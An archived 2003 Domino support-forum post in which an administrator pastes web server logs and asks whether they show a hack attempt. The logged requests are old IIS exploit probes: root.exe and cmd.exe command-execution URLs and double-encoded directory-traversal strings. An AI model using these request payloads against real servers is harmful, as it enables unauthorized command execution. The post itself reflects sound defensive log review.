This forum is closed to new posts and
responses. Individual names altered for privacy purposes. The information contained in this website is provided for informational purposes only and should not be construed as a forum for customer support requests. Any customer support requests should be directed to the official HCL customer support channels below:
~Paul Kifanachekoden 16.Dec.03 09:04 PM a Web browser Domino Server6.0.1 CF1Linux - RedHat
Hello All,
I receive a sort of "strange" logging on our Domino Web server. The log does not look the same as when a user logons to check his e-mail. It seems like someone was trying to run a WinNT command on our server, which is running Linux. Was someone really trying to "hack" the server? A partial log is listed for you to exam. I really appreciate if anyone could provide a clue. To protect the privacy for the user who could be trying to hack the server, I have replace the host ID to xxx.
Thanks.
Date: 12/15/2003 04:04:56 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 404
Content Length: 159
Content Type: text/html
Request: GET /scripts/root.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 1
Translated URI: /local/notesdata/domino/html/scripts/root.exe
Cookie:
Date: 12/15/2003 04:04:57 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 404
Content Length: 159
Content Type: text/html
Request: GET /MSADC/root.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 1
Translated URI: /local/notesdata/domino/html/MSADC/root.exe
Cookie:
Date: 12/15/2003 04:04:59 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 404
Content Length: 159
Content Type: text/html
Request: GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 1
Translated URI: /local/notesdata/domino/html/c/winnt/system32/cmd.exe
Cookie:
Date: 12/15/2003 04:05:01 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 404
Content Length: 159
Content Type: text/html
Request: GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 1
Translated URI: /local/notesdata/domino/html/d/winnt/system32/cmd.exe
Cookie:
Date: 12/15/2003 04:05:03 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 400
Content Length: 171
Content Type: text/html
Request: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 0
Translated URI:
Cookie:
Date: 12/15/2003 04:05:05 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 400
Content Length: 171
Content Type: text/html
Request: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 1
Translated URI:
Cookie:
Date: 12/15/2003 04:05:05 PM
User Address: 67.167.218.xxx
Authenticated User: -
Status: 400
Content Length: 171
Content Type: text/html
Request: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Browser Used:
Error:
Referring URL:
Server Address: www
Elapse Time (ms): 0
Translated URI:
Cookie:
Return to top
Domino Web - HACK ATTEMPT? (~Paul Kifanache... 16.Dec.03)
. . 
Print this page
